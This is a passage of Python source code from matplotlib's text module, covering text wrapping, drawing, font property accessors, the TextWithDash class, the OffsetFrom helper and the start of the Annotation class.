ACCEPTS: [ (:class:`~matplotlib.path.Path`,
:class:`~matplotlib.transforms.Transform`) |
:class:`~matplotlib.patches.Patch` | None ]
"""
super(Text, self).set_clip_path(path, transform)
self._update_clip_properties()
def set_clip_on(self, b):
"""
Set whether artist uses clipping.
When False artists will be visible out side of the axes which
can lead to unexpected results.
ACCEPTS: [True | False]
"""
super(Text, self).set_clip_on(b)
self._update_clip_properties()
def get_wrap(self):
"""
Returns the wrapping state for the text.
"""
return self._wrap
def set_wrap(self, wrap):
"""
Sets the wrapping state for the text.
"""
self._wrap = wrap
def _get_wrap_line_width(self):
"""
Returns the maximum line width for wrapping text based on the
current orientation.
"""
x0, y0 = self.get_transform().transform(self.get_position())
figure_box = self.get_figure().get_window_extent()
# Calculate available width based on text alignment
alignment = self.get_horizontalalignment()
self.set_rotation_mode('anchor')
rotation = self.get_rotation()
left = self._get_dist_to_box(rotation, x0, y0, figure_box)
right = self._get_dist_to_box(
(180 + rotation) % 360,
x0,
y0,
figure_box)
if alignment == 'left':
line_width = left
elif alignment == 'right':
line_width = right
else:
line_width = 2 * min(left, right)
return line_width
def _get_dist_to_box(self, rotation, x0, y0, figure_box):
"""
Returns the distance from the given points, to the boundaries
of a rotated box in pixels.
"""
if rotation > 270:
quad = rotation - 270
h1 = y0 / math.cos(math.radians(quad))
h2 = (figure_box.x1 - x0) / math.cos(math.radians(90 - quad))
elif rotation > 180:
quad = rotation - 180
h1 = x0 / math.cos(math.radians(quad))
h2 = y0 / math.cos(math.radians(90 - quad))
elif rotation > 90:
quad = rotation - 90
h1 = (figure_box.y1 - y0) / math.cos(math.radians(quad))
h2 = x0 / math.cos(math.radians(90 - quad))
else:
h1 = (figure_box.x1 - x0) / math.cos(math.radians(rotation))
h2 = (figure_box.y1 - y0) / math.cos(math.radians(90 - rotation))
return min(h1, h2)
def _get_rendered_text_width(self, text):
"""
Returns the width of a given text string, in pixels.
"""
w, h, d = self._renderer.get_text_width_height_descent(
text,
self.get_fontproperties(),
False)
return math.ceil(w)
def _get_wrapped_text(self):
"""
Return a copy of the text with new lines added, so that
the text is wrapped relative to the parent figure.
"""
# Not fit to handle breaking up latex syntax correctly, so
# ignore latex for now.
if self.get_usetex():
return self.get_text()
# Build the line incrementally, for a more accurate measure of length
line_width = self._get_wrap_line_width()
wrapped_str = ""
line = ""
for word in self.get_text().split(' '):
# New lines in the user's test need to force a split, so that it's
# not using the longest current line width in the line being built
sub_words = word.split('\n')
for i in range(len(sub_words)):
current_width = self._get_rendered_text_width(
line + ' ' + sub_words[i])
# Split long lines, and each newline found in the current word
if current_width > line_width or i > 0:
wrapped_str += line + '\n'
line = ""
if line == "":
line = sub_words[i]
else:
line += ' ' + sub_words[i]
return wrapped_str + line
@allow_rasterization
def draw(self, renderer):
"""
Draws the :class:`Text` object to the given *renderer*.
"""
if renderer is not None:
self._renderer = renderer
if not self.get_visible():
return
if self.get_text().strip() == '':
return
renderer.open_group('text', self.get_gid())
with _wrap_text(self) as textobj:
bbox, info, descent = textobj._get_layout(renderer)
trans = textobj.get_transform()
# don't use textobj.get_position here, which refers to text
# position in Text, and dash position in TextWithDash:
posx = float(textobj.convert_xunits(textobj._x))
posy = float(textobj.convert_yunits(textobj._y))
if not np.isfinite(posx) or not np.isfinite(posy):
raise ValueError("posx and posy should be finite values")
posx, posy = trans.transform_point((posx, posy))
canvasw, canvash = renderer.get_canvas_width_height()
# draw the FancyBboxPatch
if textobj._bbox_patch:
textobj._draw_bbox(renderer, posx, posy)
gc = renderer.new_gc()
gc.set_foreground(textobj.get_color())
gc.set_alpha(textobj.get_alpha())
gc.set_url(textobj._url)
textobj._set_gc_clip(gc)
angle = textobj.get_rotation()
for line, wh, x, y in info:
mtext = textobj if len(info) == 1 else None
x = x + posx
y = y + posy
if renderer.flipy():
y = canvash - y
clean_line, ismath = textobj.is_math_text(line,
self.get_usetex())
if textobj.get_path_effects():
from matplotlib.patheffects import PathEffectRenderer
textrenderer = PathEffectRenderer(
textobj.get_path_effects(), renderer)
else:
textrenderer = renderer
if textobj.get_usetex():
textrenderer.draw_tex(gc, x, y, clean_line,
textobj._fontproperties, angle,
mtext=mtext)
else:
textrenderer.draw_text(gc, x, y, clean_line,
textobj._fontproperties, angle,
ismath=ismath, mtext=mtext)
gc.restore()
renderer.close_group('text')
self.stale = False
def get_color(self):
"Return the color of the text"
return self._color
def get_fontproperties(self):
"Return the :class:`~font_manager.FontProperties` object"
return self._fontproperties
def get_font_properties(self):
'alias for get_fontproperties'
return self.get_fontproperties()
def get_family(self):
"Return the list of font families used for font lookup"
return self._fontproperties.get_family()
def get_fontfamily(self):
'alias for get_family'
return self.get_family()
def get_name(self):
"Return the font name as string"
return self._fontproperties.get_name()
def get_style(self):
"Return the font style as string"
return self._fontproperties.get_style()
def get_size(self):
"Return the font size as integer"
return self._fontproperties.get_size_in_points()
def get_variant(self):
"Return the font variant as a string"
return self._fontproperties.get_variant()
def get_fontvariant(self):
'alias for get_variant'
return self.get_variant()
def get_weight(self):
"Get the font weight as string or number"
return self._fontproperties.get_weight()
def get_fontname(self):
'alias for get_name'
return self.get_name()
def get_fontstyle(self):
'alias for get_style'
return self.get_style()
def get_fontsize(self):
'alias for get_size'
return self.get_size()
def get_fontweight(self):
'alias for get_weight'
return self.get_weight()
def get_stretch(self):
'Get the font stretch as a string or number'
return self._fontproperties.get_stretch()
def get_fontstretch(self):
'alias for get_stretch'
return self.get_stretch()
def get_ha(self):
'alias for get_horizontalalignment'
return self.get_horizontalalignment()
def get_horizontalalignment(self):
"""
Return the horizontal alignment as string. Will be one of
'left', 'center' or 'right'.
"""
return self._horizontalalignment
def get_unitless_position(self):
"Return the unitless position of the text as a tuple (*x*, *y*)"
# This will get the position with all unit information stripped away.
# This is here for convienience since it is done in several locations.
x = float(self.convert_xunits(self._x))
y = float(self.convert_yunits(self._y))
return x, y
def get_position(self):
"Return the position of the text as a tuple (*x*, *y*)"
# This should return the same data (possible unitized) as was
# specified with 'set_x' and 'set_y'.
return self._x, self._y
def get_prop_tup(self, renderer=None):
"""
Return a hashable tuple of properties.
Not intended to be human readable, but useful for backends who
want to cache derived information about text (e.g., layouts) and
need to know if the text has changed.
"""
x, y = self.get_unitless_position()
return (x, y, self.get_text(), self._color,
self._verticalalignment, self._horizontalalignment,
hash(self._fontproperties),
self._rotation, self._rotation_mode,
self.figure.dpi, id(renderer or self._renderer),
)
def get_text(self):
"Get the text as string"
return self._text
def get_va(self):
'alias for :meth:`getverticalalignment`'
return self.get_verticalalignment()
def get_verticalalignment(self):
"""
Return the vertical alignment as string. Will be one of
'top', 'center', 'bottom' or 'baseline'.
"""
return self._verticalalignment
def get_window_extent(self, renderer=None, dpi=None):
'''
Return a :class:`~matplotlib.transforms.Bbox` object bounding
the text, in display units.
In addition to being used internally, this is useful for
specifying clickable regions in a png file on a web page.
*renderer* defaults to the _renderer attribute of the text
object. This is not assigned until the first execution of
:meth:`draw`, so you must use this kwarg if you want
to call :meth:`get_window_extent` prior to the first
:meth:`draw`. For getting web page regions, it is
simpler to call the method after saving the figure.
*dpi* defaults to self.figure.dpi; the renderer dpi is
irrelevant. For the web application, if figure.dpi is not
the value used when saving the figure, then the value that
was used must be specified as the *dpi* argument.
'''
#return _unit_box
if not self.get_visible():
return Bbox.unit()
if dpi is not None:
dpi_orig = self.figure.dpi
self.figure.dpi = dpi
if self.get_text().strip() == '':
tx, ty = self._get_xy_display()
return Bbox.from_bounds(tx, ty, 0, 0)
if renderer is not None:
self._renderer = renderer
if self._renderer is None:
raise RuntimeError('Cannot get window extent w/o renderer')
bbox, info, descent = self._get_layout(self._renderer)
x, y = self.get_unitless_position()
x, y = self.get_transform().transform_point((x, y))
bbox = bbox.translated(x, y)
if dpi is not None:
self.figure.dpi = dpi_orig
return bbox
def set_backgroundcolor(self, color):
"""
Set the background color of the text by updating the bbox.
.. seealso::
:meth:`set_bbox`
To change the position of the bounding box.
ACCEPTS: any matplotlib color
"""
if self._bbox_patch is None:
self.set_bbox(dict(facecolor=color, edgecolor=color))
else:
self._bbox_patch.update(dict(facecolor=color))
self._update_clip_properties()
self.stale = True
def set_color(self, color):
"""
Set the foreground color of the text
ACCEPTS: any matplotlib color
"""
# Make sure it is hashable, or get_prop_tup will fail.
try:
hash(color)
except TypeError:
color = tuple(color)
self._color = color
self.stale = True
def set_ha(self, align):
'alias for set_horizontalalignment'
self.set_horizontalalignment(align)
def set_horizontalalignment(self, align):
"""
Set the horizontal alignment to one of
ACCEPTS: [ 'center' | 'right' | 'left' ]
"""
legal = ('center', 'right', 'left')
if align not in legal:
raise ValueError('Horizontal alignment must be one of %s' %
str(legal))
self._horizontalalignment = align
self.stale = True
def set_ma(self, align):
'alias for set_verticalalignment'
self.set_multialignment(align)
def set_multialignment(self, align):
"""
Set the alignment for multiple lines layout. The layout of the
bounding box of all the lines is determined bu the horizontalalignment
and verticalalignment properties, but the multiline text within that
box can be
ACCEPTS: ['left' | 'right' | 'center' ]
"""
legal = ('center', 'right', 'left')
if align not in legal:
raise ValueError('Horizontal alignment must be one of %s' %
str(legal))
self._multialignment = align
self.stale = True
def set_linespacing(self, spacing):
"""
Set the line spacing as a multiple of the font size.
Default is 1.2.
ACCEPTS: float (multiple of font size)
"""
self._linespacing = spacing
self.stale = True
def set_family(self, fontname):
"""
Set the font family. May be either a single string, or a list
of strings in decreasing priority. Each string may be either
a real font name or a generic font class name. If the latter,
the specific font names will be looked up in the
:file:`matplotlibrc` file.
ACCEPTS: [FONTNAME | 'serif' | 'sans-serif' | 'cursive' | 'fantasy' |
'monospace' ]
"""
self._fontproperties.set_family(fontname)
self.stale = True
def set_variant(self, variant):
"""
Set the font variant, either 'normal' or 'small-caps'.
ACCEPTS: [ 'normal' | 'small-caps' ]
"""
self._fontproperties.set_variant(variant)
self.stale = True
def set_fontvariant(self, variant):
'alias for set_variant'
return self.set_variant(variant)
def set_name(self, fontname):
"""alias for set_family"""
return self.set_family(fontname)
def set_fontname(self, fontname):
"""alias for set_family"""
self.set_family(fontname)
def set_style(self, fontstyle):
"""
Set the font style.
ACCEPTS: [ 'normal' | 'italic' | 'oblique']
"""
self._fontproperties.set_style(fontstyle)
self.stale = True
def set_fontstyle(self, fontstyle):
'alias for set_style'
return self.set_style(fontstyle)
def set_size(self, fontsize):
"""
Set the font size. May be either a size string, relative to
the default font size, or an absolute font size in points.
ACCEPTS: [size in points | 'xx-small' | 'x-small' | 'small' |
'medium' | 'large' | 'x-large' | 'xx-large' ]
"""
self._fontproperties.set_size(fontsize)
self.stale = True
def set_fontsize(self, fontsize):
'alias for set_size'
return self.set_size(fontsize)
def set_weight(self, weight):
"""
Set the font weight.
ACCEPTS: [a numeric value in range 0-1000 | 'ultralight' | 'light' |
'normal' | 'regular' | 'book' | 'medium' | 'roman' |
'semibold' | 'demibold' | 'demi' | 'bold' | 'heavy' |
'extra bold' | 'black' ]
"""
self._fontproperties.set_weight(weight)
self.stale = True
def set_fontweight(self, weight):
'alias for set_weight'
return self.set_weight(weight)
def set_stretch(self, stretch):
"""
Set the font stretch (horizontal condensation or expansion).
ACCEPTS: [a numeric value in range 0-1000 | 'ultra-condensed' |
'extra-condensed' | 'condensed' | 'semi-condensed' |
'normal' | 'semi-expanded' | 'expanded' | 'extra-expanded' |
'ultra-expanded' ]
"""
self._fontproperties.set_stretch(stretch)
self.stale = True
def set_fontstretch(self, stretch):
'alias for set_stretch'
return self.set_stretch(stretch)
def set_position(self, xy):
"""
Set the (*x*, *y*) position of the text
ACCEPTS: (x,y)
"""
self.set_x(xy[0])
self.set_y(xy[1])
def set_x(self, x):
"""
Set the *x* position of the text
ACCEPTS: float
"""
self._x = x
self.stale = True
def set_y(self, y):
"""
Set the *y* position of the text
ACCEPTS: float
"""
self._y = y
self.stale = True
def set_rotation(self, s):
"""
Set the rotation of the text
ACCEPTS: [ angle in degrees | 'vertical' | 'horizontal' ]
"""
self._rotation = s
self.stale = True
def set_va(self, align):
'alias for set_verticalalignment'
self.set_verticalalignment(align)
def set_verticalalignment(self, align):
"""
Set the vertical alignment
ACCEPTS: [ 'center' | 'top' | 'bottom' | 'baseline' ]
"""
legal = ('top', 'bottom', 'center', 'baseline')
if align not in legal:
raise ValueError('Vertical alignment must be one of %s' %
str(legal))
self._verticalalignment = align
self.stale = True
def set_text(self, s):
"""
Set the text string *s*
It may contain newlines (``\\n``) or math in LaTeX syntax.
ACCEPTS: string or anything printable with '%s' conversion.
"""
self._text = '%s' % (s,)
self.stale = True
@staticmethod
def is_math_text(s, usetex=None):
"""
Returns a cleaned string and a boolean flag.
The flag indicates if the given string *s* contains any mathtext,
determined by counting unescaped dollar signs. If no mathtext
is present, the cleaned string has its dollar signs unescaped.
If usetex is on, the flag always has the value "TeX".
"""
# Did we find an even number of non-escaped dollar signs?
# If so, treat is as math text.
if usetex is None:
usetex = rcParams['text.usetex']
if usetex:
if s == ' ':
s = r'\ '
return s, 'TeX'
if cbook.is_math_text(s):
return s, True
else:
return s.replace(r'\$', '$'), False
def set_fontproperties(self, fp):
"""
Set the font properties that control the text. *fp* must be a
:class:`matplotlib.font_manager.FontProperties` object.
ACCEPTS: a :class:`matplotlib.font_manager.FontProperties` instance
"""
if is_string_like(fp):
fp = FontProperties(fp)
self._fontproperties = fp.copy()
self.stale = True
def set_font_properties(self, fp):
'alias for set_fontproperties'
self.set_fontproperties(fp)
def set_usetex(self, usetex):
"""
Set this `Text` object to render using TeX (or not).
If `None` is given, the option will be reset to use the value of
`rcParams['text.usetex']`
"""
if usetex is None:
self._usetex = rcParams['text.usetex']
else:
self._usetex = bool(usetex)
self.stale = True
def get_usetex(self):
"""
Return whether this `Text` object will render using TeX.
If the user has not manually set this value, it will default to
the value of `rcParams['text.usetex']`
"""
if self._usetex is None:
return rcParams['text.usetex']
else:
return self._usetex
docstring.interpd.update(Text=artist.kwdoc(Text))
docstring.dedent_interpd(Text.__init__)
class TextWithDash(Text):
"""
This is basically a :class:`~matplotlib.text.Text` with a dash
(drawn with a :class:`~matplotlib.lines.Line2D`) before/after
it. It is intended to be a drop-in replacement for
:class:`~matplotlib.text.Text`, and should behave identically to
it when *dashlength* = 0.0.
The dash always comes between the point specified by
:meth:`~matplotlib.text.Text.set_position` and the text. When a
dash exists, the text alignment arguments (*horizontalalignment*,
*verticalalignment*) are ignored.
*dashlength* is the length of the dash in canvas units.
(default = 0.0).
*dashdirection* is one of 0 or 1, where 0 draws the dash after the
text and 1 before. (default = 0).
*dashrotation* specifies the rotation of the dash, and should
generally stay *None*. In this case
:meth:`~matplotlib.text.TextWithDash.get_dashrotation` returns
:meth:`~matplotlib.text.Text.get_rotation`. (i.e., the dash takes
its rotation from the text's rotation). Because the text center is
projected onto the dash, major deviations in the rotation cause
what may be considered visually unappealing results.
(default = *None*)
*dashpad* is a padding length to add (or subtract) space
between the text and the dash, in canvas units.
(default = 3)
*dashpush* "pushes" the dash and text away from the point
specified by :meth:`~matplotlib.text.Text.set_position` by the
amount in canvas units. (default = 0)
.. note::
The alignment of the two objects is based on the bounding box
of the :class:`~matplotlib.text.Text`, as obtained by
:meth:`~matplotlib.artist.Artist.get_window_extent`. This, in
turn, appears to depend on the font metrics as given by the
rendering backend. Hence the quality of the "centering" of the
label text with respect to the dash varies depending on the
backend used.
.. note::
I'm not sure that I got the
:meth:`~matplotlib.text.TextWithDash.get_window_extent` right,
or whether that's sufficient for providing the object bounding
box.
"""
__name__ = 'textwithdash'
def __str__(self):
return "TextWithDash(%g,%g,%s)" % (self._x, self._y, repr(self._text))
def __init__(self,
x=0, y=0, text='',
color=None, # defaults to rc params
verticalalignment='center',
horizontalalignment='center',
multialignment=None,
fontproperties=None, # defaults to FontProperties()
rotation=None,
linespacing=None,
dashlength=0.0,
dashdirection=0,
dashrotation=None,
dashpad=3,
dashpush=0,
):
Text.__init__(self, x=x, y=y, text=text, color=color,
verticalalignment=verticalalignment,
horizontalalignment=horizontalalignment,
multialignment=multialignment,
fontproperties=fontproperties,
rotation=rotation,
linespacing=linespacing)
# The position (x,y) values for text and dashline
# are bogus as given in the instantiation; they will
# be set correctly by update_coords() in draw()
self.dashline = Line2D(xdata=(x, x),
ydata=(y, y),
color='k',
linestyle='-')
self._dashx = float(x)
self._dashy = float(y)
self._dashlength = dashlength
self._dashdirection = dashdirection
self._dashrotation = dashrotation
self._dashpad = dashpad
self._dashpush = dashpush
#self.set_bbox(dict(pad=0))
def get_unitless_position(self):
"Return the unitless position of the text as a tuple (*x*, *y*)"
# This will get the position with all unit information stripped away.
# This is here for convienience since it is done in several locations.
x = float(self.convert_xunits(self._dashx))
y = float(self.convert_yunits(self._dashy))
return x, y
def get_position(self):
"Return the position of the text as a tuple (*x*, *y*)"
# This should return the same data (possibly unitized) as was
# specified with set_x and set_y
return self._dashx, self._dashy
def get_prop_tup(self, renderer=None):
"""
Return a hashable tuple of properties.
Not intended to be human readable, but useful for backends who
want to cache derived information about text (e.g., layouts) and
need to know if the text has changed.
"""
props = [p for p in Text.get_prop_tup(self, renderer=renderer)]
props.extend([self._x, self._y, self._dashlength,
self._dashdirection, self._dashrotation, self._dashpad,
self._dashpush])
return tuple(props)
def draw(self, renderer):
"""
Draw the :class:`TextWithDash` object to the given *renderer*.
"""
self.update_coords(renderer)
Text.draw(self, renderer)
if self.get_dashlength() > 0.0:
self.dashline.draw(renderer)
self.stale = False
def update_coords(self, renderer):
"""
Computes the actual *x*, *y* coordinates for text based on the
input *x*, *y* and the *dashlength*. Since the rotation is
with respect to the actual canvas's coordinates we need to map
back and forth.
"""
dashx, dashy = self.get_unitless_position()
dashlength = self.get_dashlength()
# Shortcircuit this process if we don't have a dash
if dashlength == 0.0:
self._x, self._y = dashx, dashy
return
dashrotation = self.get_dashrotation()
dashdirection = self.get_dashdirection()
dashpad = self.get_dashpad()
dashpush = self.get_dashpush()
angle = get_rotation(dashrotation)
theta = np.pi * (angle / 180.0 + dashdirection - 1)
cos_theta, sin_theta = np.cos(theta), np.sin(theta)
transform = self.get_transform()
# Compute the dash end points
# The 'c' prefix is for canvas coordinates
cxy = transform.transform_point((dashx, dashy))
cd = np.array([cos_theta, sin_theta])
c1 = cxy + dashpush * cd
c2 = cxy + (dashpush + dashlength) * cd
inverse = transform.inverted()
(x1, y1) = inverse.transform_point(tuple(c1))
(x2, y2) = inverse.transform_point(tuple(c2))
self.dashline.set_data((x1, x2), (y1, y2))
# We now need to extend this vector out to
# the center of the text area.
# The basic problem here is that we're "rotating"
# two separate objects but want it to appear as
# if they're rotated together.
# This is made non-trivial because of the
# interaction between text rotation and alignment -
# text alignment is based on the bbox after rotation.
# We reset/force both alignments to 'center'
# so we can do something relatively reasonable.
# There's probably a better way to do this by
# embedding all this in the object's transformations,
# but I don't grok the transformation stuff
# well enough yet.
we = Text.get_window_extent(self, renderer=renderer)
w, h = we.width, we.height
# Watch for zeros
if sin_theta == 0.0:
dx = w
dy = 0.0
elif cos_theta == 0.0:
dx = 0.0
dy = h
else:
tan_theta = sin_theta / cos_theta
dx = w
dy = w * tan_theta
if dy > h or dy < -h:
dy = h
dx = h / tan_theta
cwd = np.array([dx, dy]) / 2
cwd *= 1 + dashpad / np.sqrt(np.dot(cwd, cwd))
cw = c2 + (dashdirection * 2 - 1) * cwd
newx, newy = inverse.transform_point(tuple(cw))
self._x, self._y = newx, newy
# Now set the window extent
# I'm not at all sure this is the right way to do this.
we = Text.get_window_extent(self, renderer=renderer)
self._twd_window_extent = we.frozen()
self._twd_window_extent.update_from_data_xy(np.array([c1]), False)
# Finally, make text align center
Text.set_horizontalalignment(self, 'center')
Text.set_verticalalignment(self, 'center')
def get_window_extent(self, renderer=None):
'''
Return a :class:`~matplotlib.transforms.Bbox` object bounding
the text, in display units.
In addition to being used internally, this is useful for
specifying clickable regions in a png file on a web page.
*renderer* defaults to the _renderer attribute of the text
object. This is not assigned until the first execution of
:meth:`draw`, so you must use this kwarg if you want
to call :meth:`get_window_extent` prior to the first
:meth:`draw`. For getting web page regions, it is
simpler to call the method after saving the figure.
'''
self.update_coords(renderer)
if self.get_dashlength() == 0.0:
return Text.get_window_extent(self, renderer=renderer)
else:
return self._twd_window_extent
def get_dashlength(self):
"""
Get the length of the dash.
"""
return self._dashlength
def set_dashlength(self, dl):
"""
Set the length of the dash.
ACCEPTS: float (canvas units)
"""
self._dashlength = dl
self.stale = True
def get_dashdirection(self):
"""
Get the direction dash. 1 is before the text and 0 is after.
"""
return self._dashdirection
def set_dashdirection(self, dd):
"""
Set the direction of the dash following the text.
1 is before the text and 0 is after. The default
is 0, which is what you'd want for the typical
case of ticks below and on the left of the figure.
ACCEPTS: int (1 is before, 0 is after)
"""
self._dashdirection = dd
self.stale = True
def get_dashrotation(self):
"""
Get the rotation of the dash in degrees.
"""
if self._dashrotation is None:
return self.get_rotation()
else:
return self._dashrotation
def set_dashrotation(self, dr):
"""
Set the rotation of the dash, in degrees
ACCEPTS: float (degrees)
"""
self._dashrotation = dr
self.stale = True
def get_dashpad(self):
"""
Get the extra spacing between the dash and the text, in canvas units.
"""
return self._dashpad
def set_dashpad(self, dp):
"""
Set the "pad" of the TextWithDash, which is the extra spacing
between the dash and the text, in canvas units.
ACCEPTS: float (canvas units)
"""
self._dashpad = dp
self.stale = True
def get_dashpush(self):
"""
Get the extra spacing between the dash and the specified text
position, in canvas units.
"""
return self._dashpush
def set_dashpush(self, dp):
"""
Set the "push" of the TextWithDash, which
is the extra spacing between the beginning
of the dash and the specified position.
ACCEPTS: float (canvas units)
"""
self._dashpush = dp
self.stale = True
def set_position(self, xy):
"""
Set the (*x*, *y*) position of the :class:`TextWithDash`.
ACCEPTS: (x, y)
"""
self.set_x(xy[0])
self.set_y(xy[1])
def set_x(self, x):
"""
Set the *x* position of the :class:`TextWithDash`.
ACCEPTS: float
"""
self._dashx = float(x)
self.stale = True
def set_y(self, y):
"""
Set the *y* position of the :class:`TextWithDash`.
ACCEPTS: float
"""
self._dashy = float(y)
self.stale = True
def set_transform(self, t):
"""
Set the :class:`matplotlib.transforms.Transform` instance used
by this artist.
ACCEPTS: a :class:`matplotlib.transforms.Transform` instance
"""
Text.set_transform(self, t)
self.dashline.set_transform(t)
self.stale = True
def get_figure(self):
'return the figure instance the artist belongs to'
return self.figure
def set_figure(self, fig):
"""
Set the figure instance the artist belong to.
ACCEPTS: a :class:`matplotlib.figure.Figure` instance
"""
Text.set_figure(self, fig)
self.dashline.set_figure(fig)
docstring.interpd.update(TextWithDash=artist.kwdoc(TextWithDash))
class OffsetFrom(object):
'Callable helper class for working with `Annotation`'
def __init__(self, artist, ref_coord, unit="points"):
'''
Parameters
----------
artist : `Artist`, `BboxBase`, or `Transform`
The object to compute the offset from.
ref_coord : length 2 sequence
If `artist` is an `Artist` or `BboxBase`, this values is
the location to of the offset origin in fractions of the
`artist` bounding box.
If `artist` is a transform, the offset origin is the
transform applied to this value.
unit : {'points, 'pixels'}
The screen units to use (pixels or points) for the offset
input.
'''
self._artist = artist
self._ref_coord = ref_coord
self.set_unit(unit)
def set_unit(self, unit):
'''
The unit for input to the transform used by ``__call__``
Parameters
----------
unit : {'points', 'pixels'}
'''
if unit not in ["points", "pixels"]:
raise ValueError("'unit' must be one of [ 'points' | 'pixels' ]")
self._unit = unit
def get_unit(self):
'The unit for input to the transform used by ``__call__``'
return self._unit
def _get_scale(self, renderer):
unit = self.get_unit()
if unit == "pixels":
return 1.
else:
return renderer.points_to_pixels(1.)
def __call__(self, renderer):
'''
Return the offset transform.
Parameters
----------
renderer : `RendererBase`
The renderer to use to compute the offset
Returns
-------
transform : `Transform`
Maps (x, y) in pixel or point units to screen units
relative to the given artist.
'''
if isinstance(self._artist, Artist):
bbox = self._artist.get_window_extent(renderer)
l, b, w, h = bbox.bounds
xf, yf = self._ref_coord
x, y = l + w * xf, b + h * yf
elif isinstance(self._artist, BboxBase):
l, b, w, h = self._artist.bounds
xf, yf = self._ref_coord
x, y = l + w * xf, b + h * yf
elif isinstance(self._artist, Transform):
x, y = self._artist.transform_point(self._ref_coord)
else:
raise RuntimeError("unknown type")
sc = self._get_scale(renderer)
tr = Affine2D().scale(sc, sc).translate(x, y)
return tr
class _AnnotationBase(object):
def __init__(self,
xy,
xycoords='data',
annotation_clip=None):
self.xy = xy
self.xycoords = xycoords
self.set_annotation_clip(annotation_clip)
self._draggable = None
def _get_xy(self, renderer, x, y, s):
if isinstance(s, tuple):
s1, s2 = s
else:
s1, s2 = s, s
if s1 == 'data':
x = float(self.convert_xunits(x))
if s2 == 'data':
y = float(self.convert_yunits(y))
tr = self._get_xy_transform(renderer, s)
x1, y1 = tr.transform_point((x, y))
return x1, y1
def _get_xy_transform(self, renderer, s):
if isinstance(s, tuple):
s1, s2 = s
from matplotlib.transforms import blended_transform_factory
tr1 = self._get_xy_transform(renderer, s1)
tr2 = self._get_xy_transform(renderer, s2)
tr = blended_transform_factory(tr1, tr2)
return tr
if six.callable(s):
tr = s(renderer)
if isinstance(tr, BboxBase):
return BboxTransformTo(tr)
elif isinstance(tr, Transform):
return tr
else:
raise RuntimeError("unknown return type ...")
if isinstance(s, Artist):
bbox = s.get_window_extent(renderer)
return BboxTransformTo(bbox)
elif isinstance(s, BboxBase):
return BboxTransformTo(s)
elif isinstance(s, Transform):
return s
elif not is_string_like(s):
raise RuntimeError("unknown coordinate type : %s" % (s,))
if s == 'data':
return self.axes.transData
elif s == 'polar':
from matplotlib.projections import PolarAxes
tr = PolarAxes.PolarTransform()
trans = tr + self.axes.transData
return trans
s_ = s.split()
if len(s_) != 2:
raise ValueError("%s is not a recognized coordinate" % s)
bbox0, xy0 = None, None
bbox_name, unit = s_
# if unit is offset-like
if bbox_name == "figure":
bbox0 = self.figure.bbox
elif bbox_name == "axes":
bbox0 = self.axes.bbox
# elif bbox_name == "bbox":
# if bbox is None:
# raise RuntimeError("bbox is specified as a coordinate but "
# "never set")
# bbox0 = self._get_bbox(renderer, bbox)
if bbox0 is not None:
xy0 = bbox0.bounds[:2]
elif bbox_name == "offset":
xy0 = self._get_ref_xy(renderer)
if xy0 is not None:
# reference x, y in display coordinate
ref_x, ref_y = xy0
from matplotlib.transforms import Affine2D
if unit == "points":
# dots per points
dpp = self.figure.get_dpi() / 72.
tr = Affine2D().scale(dpp, dpp)
elif unit == "pixels":
tr = Affine2D()
elif unit == "fontsize":
fontsize = self.get_size()
dpp = fontsize * self.figure.get_dpi() / 72.
tr = Affine2D().scale(dpp,
dpp)
elif unit == "fraction":
w, h = bbox0.bounds[2:]
tr = Affine2D().scale(w, h)
else:
raise ValueError("%s is not a recognized coordinate" % s)
return tr.translate(ref_x, ref_y)
else:
raise ValueError("%s is not a recognized coordinate" % s)
def _get_ref_xy(self, renderer):
"""
return x, y (in display coordinate) that is to be used for a reference
of any offset coordinate
"""
if isinstance(self.xycoords, tuple):
s1, s2 = self.xycoords
if ((is_string_like(s1) and s1.split()[0] == "offset") or
(is_string_like(s2) and s2.split()[0] == "offset")):
raise ValueError("xycoords should not be an offset coordinate")
x, y = self.xy
x1, y1 = self._get_xy(renderer, x, y, s1)
x2, y2 = self._get_xy(renderer, x, y, s2)
return x1, y2
elif (is_string_like(self.xycoords) and
self.xycoords.split()[0] == "offset"):
raise ValueError("xycoords should not be an offset coordinate")
else:
x, y = self.xy
return self._get_xy(renderer, x, y, self.xycoords)
#raise RuntimeError("must be defined by the derived class")
# def _get_bbox(self, renderer):
# if hasattr(bbox, "bounds"):
# return bbox
# elif hasattr(bbox, "get_window_extent"):
# bbox = bbox.get_window_extent()
# return bbox
# else:
# raise ValueError("A bbox instance is expected but got %s" %
# str(bbox))
def set_annotation_clip(self, b):
"""
set *annotation_clip* attribute.
* True: the annotation will only be drawn when self.xy is inside
the axes.
* False: the annotation will always be drawn regardless of its
position.
* None: the self.xy will be checked only if *xycoords* is "data"
"""
self._annotation_clip = b
def get_annotation_clip(self):
"""
Return *annotation_clip* attribute.
See :meth:`set_annotation_clip` for the meaning of return values.
"""
return self._annotation_clip
def _get_position_xy(self, renderer):
"Return the pixel position of the annotated point."
x, y = self.xy
return self._get_xy(renderer, x, y, self.xycoords)
def _check_xy(self, renderer, xy_pixel):
"""
given the xy pixel coordinate, check if the annotation need to
be drawn.
"""
b = self.get_annotation_clip()
if b or (b is None and self.xycoords == "data"):
# check if self.xy is inside the axes.
if not self.axes.contains_point(xy_pixel):
return False
return True
def draggable(self, state=None, use_blit=False):
"""
Set the draggable state -- if state is
* None : toggle the current state
* True : turn draggable on
* False : turn draggable off
If draggable is on, you can drag the annotation on the canvas with
the mouse. The DraggableAnnotation helper instance is returned if
draggable is on.
"""
from matplotlib.offsetbox import DraggableAnnotation
is_draggable = self._draggable is not None
# if state is None we'll toggle
if state is None:
state = not is_draggable
if state:
if self._draggable is None:
self._draggable = DraggableAnnotation(self, use_blit)
else:
if self._draggable is not None:
self._draggable.disconnect()
self._draggable = None
return self._draggable
class Annotation(Text, _AnnotationBase):
def __str__(self):
return "Annotation(%g,%g,%s)" % (self.xy[0],
self.xy[1],
repr(self._text))
@docstring.dedent_interpd
def __init__(self, s, xy,
xytext=None,
xycoords='data',
textcoords=None,
arrowprops=None,
annotation_clip=None,
**kwargs):
'''
Annotate the point ``xy`` with text ``s``.
Additional kwargs are passed to `~matplotlib.text.Text`.
Parameters
----------
s : str
The text of the annotation
xy : iterable
Length 2 sequence specifying the *(x,y)* point to annotate
xytext : iterable, optional
Length 2 sequence specifying the *(x,y)* to place the text
at. If None, defaults to ``xy``.
xycoords : str, Artist, Transform, callable or tuple, optional
The coordinate system that ``xy`` is given in.
For a `str` the allowed values are:
================= ===============================================
Property Description
================= ===============================================
'figure points' points from the lower left of the figure
'figure pixels' pixels from the lower left of the figure
